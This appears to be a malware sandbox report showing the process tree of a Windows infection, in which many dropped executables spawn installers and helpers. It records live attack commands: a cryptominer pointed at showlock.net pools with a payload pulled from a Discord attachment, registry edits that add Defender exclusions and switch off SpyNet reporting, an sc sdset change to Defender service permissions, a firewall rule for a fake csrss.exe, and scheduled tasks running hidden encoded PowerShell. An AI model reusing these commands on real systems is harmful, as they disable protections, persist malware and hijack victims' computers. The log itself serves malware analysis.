C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:807⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --tls --nicehash -o showlock.net:443 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --tls --nicehash -o showlock.net:80 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --nicehash --http-port 3433 --http-access-token ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --randomx-wrmsr=-18⤵PID:5552
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 55528⤵PID:5800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 3489⤵PID:5624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 3849⤵PID:4016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 4609⤵PID:5184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6049⤵PID:1360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 5729⤵PID:1464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6769⤵PID:5448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6049⤵PID:5192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6889⤵PID:5208
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12807⤵PID:3168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 13807⤵PID:5212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 13167⤵PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 13607⤵PID:5680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 14127⤵PID:4788
-
-
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵PID:4216
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4608
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:5088
-
-
-
-
C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"4⤵PID:1936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 4325⤵
- Program crash
PID:1352
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6525⤵
- Program crash
PID:1744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 7885⤵
- Program crash
PID:1880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6365⤵
- Program crash
PID:3376
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6525⤵
- Program crash
PID:2020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 7125⤵
- Program crash
PID:1952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6485⤵
- Program crash
PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 4165⤵
- Program crash
PID:4716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 3845⤵
- Program crash
PID:3692
-
-
C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"5⤵PID:3620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 3246⤵
- Program crash
PID:2244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 6326⤵
- Program crash
PID:1296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 6766⤵
- Program crash
PID:4976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 7726⤵
- Program crash
PID:1012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 5606⤵
- Program crash
PID:4792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 6526⤵
- Program crash
PID:4436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 5926⤵
- Program crash
PID:1748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 3686⤵
- Program crash
PID:4896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 3486⤵
- Program crash
PID:8
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2148
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3344
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5084
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:1108
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 8446⤵
- Program crash
PID:4404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 5806⤵
- Program crash
PID:1560
-
-
-
-
C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"4⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\is-GEQU1.tmp\ofO0kq3KHSooXJGY7KSuEiLf.tmp"C:\Users\Admin\AppData\Local\Temp\is-GEQU1.tmp\ofO0kq3KHSooXJGY7KSuEiLf.tmp" /SL5="$30348,140559,56832,C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"5⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\is-9SJKF.tmp\444567.exe"C:\Users\Admin\AppData\Local\Temp\is-9SJKF.tmp\444567.exe" /S /UID=lylal2206⤵PID:4728
-
C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe"C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe" /VERYSILENT7⤵PID:3876
-
C:\Users\Admin\AppData\Local\Temp\is-SFM0N.tmp\lightcleaner.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFM0N.tmp\lightcleaner.tmp" /SL5="$603E0,833775,56832,C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe" /VERYSILENT8⤵PID:1560
-
-
-
-
-
-
C:\Users\Admin\Pictures\17aV29QH6Rmgn47hVNowHB5G.exe"C:\Users\Admin\Pictures\17aV29QH6Rmgn47hVNowHB5G.exe"4⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe5⤵PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\nsmF872.tmpC:\Users\Admin\AppData\Local\Temp\nsmF872.tmp5⤵PID:3464
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsmF872.tmp" & del "C:\ProgramData\*.dll"" & exit6⤵PID:5324
-
C:\Windows\SysWOW64\timeout.exetimeout /t 57⤵
- Delays execution with timeout.exe
PID:5136
-
-
-
-
-
C:\Users\Admin\Pictures\1rfVzdez8rjv7xiJyUjZRMvg.exe"C:\Users\Admin\Pictures\1rfVzdez8rjv7xiJyUjZRMvg.exe"4⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\7zS72A2.tmp\Install.exe.\Install.exe5⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\7zS7457.tmp\Install.exe.\Install.exe /UdidKIT "385118" /S6⤵PID:200
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:4144
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:2924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXHqnkEfc"7⤵PID:1068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXHqnkEfc" /SC once /ST 09:57:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:4404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQqfrfOcqJXaOOvqOO" /SC once /ST 15:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe\" pA /gDsite_idWIs 385118 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:4108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXHqnkEfc"7⤵PID:2512
-
-
-
-
-
C:\Users\Admin\Pictures\UBjvCSWLu2Wgo8xdGwh8QoUE.exe"C:\Users\Admin\Pictures\UBjvCSWLu2Wgo8xdGwh8QoUE.exe"4⤵PID:3052
-
-
C:\Users\Admin\Pictures\xTc86FPYwI4av8HXSuO6jsPd.exe"C:\Users\Admin\Pictures\xTc86FPYwI4av8HXSuO6jsPd.exe"4⤵PID:3720
-
-
C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"4⤵PID:740
-
C:\Users\Admin\AppData\Local\Temp\is-54UO9.tmp\4ujLv5Z6YXMoxcYc6vqcHyMs.tmp"C:\Users\Admin\AppData\Local\Temp\is-54UO9.tmp\4ujLv5Z6YXMoxcYc6vqcHyMs.tmp" /SL5="$3046E,140559,56832,C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"5⤵PID:4160
-
C:\Users\Admin\AppData\Local\Temp\is-H6FRO.tmp\444567.exe"C:\Users\Admin\AppData\Local\Temp\is-H6FRO.tmp\444567.exe" /S /UID=lylal2206⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\2e-4dbe1-de7-f09b8-8401ead4f22e7\Tyhykepaesha.exe"C:\Users\Admin\AppData\Local\Temp\2e-4dbe1-de7-f09b8-8401ead4f22e7\Tyhykepaesha.exe"7⤵PID:5944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k 2cba948feb9c53fce4409f0079aec61c.exe & exit8⤵PID:6096
-
-
-
-
-
-
C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"4⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 3845⤵PID:5548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 3885⤵PID:6100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 4005⤵PID:5260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6205⤵PID:5308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6245⤵PID:6028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6925⤵PID:3608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6485⤵PID:5776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 7045⤵PID:6044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 7805⤵PID:5832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5244
-
-
C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"5⤵PID:1960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3486⤵PID:364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3246⤵PID:5244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3286⤵PID:2384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 5926⤵
- Executes dropped EXE
PID:200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6286⤵PID:5772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6646⤵PID:2728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 5646⤵PID:5556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6806⤵PID:6844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 7726⤵PID:7964
-
-
-
-
C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"4⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\is-CVOQL.tmp\xi86LmwZnIdpohyoS43cg6Jg.tmp"C:\Users\Admin\AppData\Local\Temp\is-CVOQL.tmp\xi86LmwZnIdpohyoS43cg6Jg.tmp" /SL5="$3047E,4472587,54272,C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"5⤵PID:1616
-
-
-
C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"4⤵PID:1676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 3845⤵PID:5608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 3885⤵PID:6056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 4285⤵PID:5144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6205⤵PID:5932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6245⤵PID:5424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6925⤵PID:5328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 7085⤵PID:5680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6925⤵PID:5612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 7805⤵PID:5880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3608
-
-
-
C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"5⤵PID:5540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 3486⤵PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 3526⤵PID:2228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 3646⤵PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6166⤵PID:1296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6286⤵PID:6208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6646⤵PID:5640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6166⤵PID:7500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6606⤵PID:6548
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 7045⤵PID:4588
-
-
-
C:\Users\Admin\Pictures\wuQrN7lJg73nWuNi8ztKAbNY.exe"C:\Users\Admin\Pictures\wuQrN7lJg73nWuNi8ztKAbNY.exe"4⤵PID:5164
-
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe"C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe" --silent --allusers=04⤵PID:3916
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exeC:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.28 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6a899530,0x6a89953c,0x6a8995485⤵PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\odg2FEYTs5iKvF4RVV78MLvT.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\odg2FEYTs5iKvF4RVV78MLvT.exe" --version5⤵PID:5628
-
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe"C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3916 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240110150735" --session-guid=133a7e0c-ec6f-47dc-80e1-d84f5f73be03 --server-tracking-blob=NDAxMDRkMzMyZTM1NzI5YWYyZTUyNzY5ZjY4NTZiOWM5NjkwZjY2OGE2NTZkMmJiOTVkMWZmMWZjMWUxYzNjYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNDg5OTE4OS42NTg1IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4MzNkODM3Ny04N2Q3LTQwZGItYmVhOC00ZjM2NjJiYjYyNWMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=58040000000000005⤵PID:5984
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exeC:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.28 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x69fb9530,0x69fb953c,0x69fb95486⤵PID:5940
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"5⤵PID:7000
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe" --version5⤵PID:7432
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x250,0x254,0x258,0x20c,0x25c,0xd42614,0xd42620,0xd4262c6⤵PID:7524
-
-
-
-
C:\Users\Admin\Pictures\Fee43Liu8jsmJxLuC5rYw7q8.exe"C:\Users\Admin\Pictures\Fee43Liu8jsmJxLuC5rYw7q8.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==4⤵PID:5824
-
-
C:\Users\Admin\Pictures\WLtBnfLYUgwAWQ58Nddtr3eR.exe"C:\Users\Admin\Pictures\WLtBnfLYUgwAWQ58Nddtr3eR.exe"4⤵PID:7764
-
-
C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"4⤵PID:6760
-
C:\Users\Admin\AppData\Local\Temp\is-4K4I9.tmp\9Lati8rG1WqatsFoe64FHPb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-4K4I9.tmp\9Lati8rG1WqatsFoe64FHPb3.tmp" /SL5="$30716,4472587,54272,C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"5⤵PID:7516
-
-
-
C:\Users\Admin\Pictures\CMVI26JLyEGTxhVlk9eyKjKW.exe"C:\Users\Admin\Pictures\CMVI26JLyEGTxhVlk9eyKjKW.exe"4⤵PID:5624
-
-
C:\Users\Admin\Pictures\y1CcAWeg6a1LjR3sYNmYEAsu.exe"C:\Users\Admin\Pictures\y1CcAWeg6a1LjR3sYNmYEAsu.exe"4⤵PID:6332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 3845⤵PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 4125⤵PID:7544
-
-
-
C:\Users\Admin\Pictures\wPpRIf3bcoVCf0WBbQjmtWjJ.exe"C:\Users\Admin\Pictures\wPpRIf3bcoVCf0WBbQjmtWjJ.exe"4⤵PID:1096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 3845⤵PID:7984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 3605⤵PID:6420
-
-
-
C:\Users\Admin\Pictures\vpc7O7LFnIjjCIqT97KnRBP6.exe"C:\Users\Admin\Pictures\vpc7O7LFnIjjCIqT97KnRBP6.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==4⤵PID:8124
-
-
